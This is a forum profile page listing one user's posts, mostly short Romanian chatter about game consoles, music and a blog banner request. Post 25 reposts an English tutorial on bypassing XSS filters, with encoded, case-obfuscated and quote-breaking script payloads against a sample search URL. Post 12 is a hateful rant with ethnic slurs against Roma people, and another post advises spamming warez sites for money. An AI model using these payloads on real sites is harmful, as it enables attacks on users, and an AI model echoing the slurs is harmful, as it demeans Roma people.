Jump to content

Gonzalez

Active Members
 View Profile  See their activity

  • Posts

    1579

  • Joined

  • Last visited

  • Days Won

    10

 Content Type 

Everything posted by Gonzalez

  1. Gonzalez
    Eu personal aleg PS4, sunt un mare fac PS , desi am avut un xbox360. Si preturile vor fi pe masura ... -Gonzalez
  2. Gonzalez
    Xbox720 - Next Xbox 720 to launch in 2011-2012 sau PS4 -Gonzalez
  3. Gonzalez
    Folositi Multi Poster 4 si adaugati template-uri cu site-uri si vin mai repede banii, sau postazi manual la site-urile mari de warez. -Gonzalez
  4. Gonzalez
    As avea nevoie de un banner pentru blog. Cerinte: - text: Devilived.net - sa fie 1300x400 sau mai mic - sa includa logo-ul - culoarea sa fie albastra (deschis la culoara daca se poate) - sa arate cat de cat misto Recompensa: - link-ul tau pe blog ( aprox 200 vizitatori pe zi, si e in crestere) Vizitati blogul pentru a va uita cam la marimea bannerului. Blog: THE DUMP :: DeviLiveD.NeT Multumesc. -Gonzalez
  5. Gonzalez
    B.U.G Mafia - Ingerii pierduti.mp3 -Gonzalez
  6. Gonzalez
    Ma rup si ma uit vreo 2 ore la clip, mersi pax. -Gonzalez
  7. Gonzalez

    Vand

    Gonzalez replied to Dokil's topic in Off-topic

    Chiar pe RST te-ai gandit sa-l vinzi? -Gonzalez
  8. Gonzalez
    La cabana mea la munte. -Gonzalez
  9. Gonzalez
    Cel mai tare CWalk: -Gonzalez
  10. Gonzalez
    Mersi Neme. -Gonzalez
  11. Gonzalez
    Freddie Gibbs - The Ghetto.mp3 -Gonza;ez
  12. Gonzalez
    Tigani borati, sa ma pis pe rasa lor de tigani , cacatii dracului. Tiganu TOT TIGAN RAMANE, mortii lor. Conecter si gorila aia mica sa suga. -Gonzalez
  13. Gonzalez
    Astia toti au probleme. -Gonzalez
  14. Gonzalez
    Afaceri mari. -Gonzalez
  15. Gonzalez
    Imi place ca scrie: Conecter pe cruce in rasa masi de tigan. Tare piesa si videoclipul. -Gonzalez
  16. Gonzalez
    Cand vi acasa Neme adu ceva thailandeze bune. -Gonzalez
  17. Gonzalez
    Thanks. -Gonzalez
  18. Gonzalez
    Primul Zeitgeist mi-a placut, astept pe acesta sa vad cum e. -Gonzalez
  19. Gonzalez
    Interesant. -Gonzalez
  20. Gonzalez
    Mersi. -Gonzalez
  21. Gonzalez

    DeViLiVeD

    Gonzalez replied to Gonzalez's topic in Linkuri

    Update. L-am transformat intr-un blog. www.devilived.net -Gonzalez
  22. Gonzalez
    Rusine Romania. Tara in care nimic nu se termina. -Gonzalez
  23. Gonzalez
    Mersi pentru informatii. -Gonzalez
  24. Gonzalez
    Mult mai bun si fain e CS Source pe deasupra mai popular. -Gonzalez
  25. Gonzalez
    ############################################# #Title : XSS, how to bypass filters # #Author : k3nz0 # #Contact : o9p@hotmail.fr # #Category : Papers # #Website : k3nz0.com # ############################################# #################Tunisian#################### ##################Hacker##################### ############################################# This lessons is devided into 3 parts : [1] Introduction [2] Types of filters [3] Conclusion [1] Introduction : Nowadays, most of "securised" websites, make filters to don't allow cross site scripting "injections", however, we can bypass these filters by using the methods shown below [2] Types of filters : We will learn, how to bypass these xss filters : [+]Bypass magic_quotes_gpc (if it's on ) [+]Bypass with cryption in full html [+]Bypass with Obfuscation [+]Bypass with trying around method ############################################ [+]Bypass magic_quotes_gpc When magic_quotes_gpc is on, it means that the server doesn't allow, ", / and ' (it depends) to bypass it we use : String.fromCharCode() We write our code, in the () crypted in ASCII exemple : String.fromCharCode(107, 51, 110, 122, 48) (Here I crypted k3nz0 in ascii : 107, 51, 110, 122, 48 And we use it : <script>String.fromCharCode(107, 51, 110, 122, 48)</script> We will see : k3nz0 We bypassed magic_quotes_gpc ############################################# [+] Bypass with cryption in full html : Very simple, we have to encode our code in full HTTP! Our code : <script>alert('i am here')</script> And in full HTTP : %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E Now, you can inject it ! Notice that you can use the tool "Coder" to do encode it in full HTTP We bypassed filter. ############################################# [+] Bypass with Obfuscation : Very simple too, this filter, don't allows for exemple these words : -script -alert To bypass it, you change "script" with for exemple "sCriPt", and "alert" with "ALerT" ! For exemple : <ScriPt>ALeRt("i am here")</scriPt> We bypassed the filter. ############################################## [+] Bypass with trying around method : Generally, it is in the searchs scripts, we just add "> at the begining to close current fields : exemple : http://target.com/search.php?search="><script>alert("hello")</script> We bypassed the filter. ############################################### [3] Conclusion : It was, how we can bypass xss filters, and how to inject our code This lesson is explained by k3nz0 Thank you for reading GREETZ : ALLAH ! Aymanos, v1r, kannibal615 , born to kill, & more.. ################################################
×
×
  • Create New...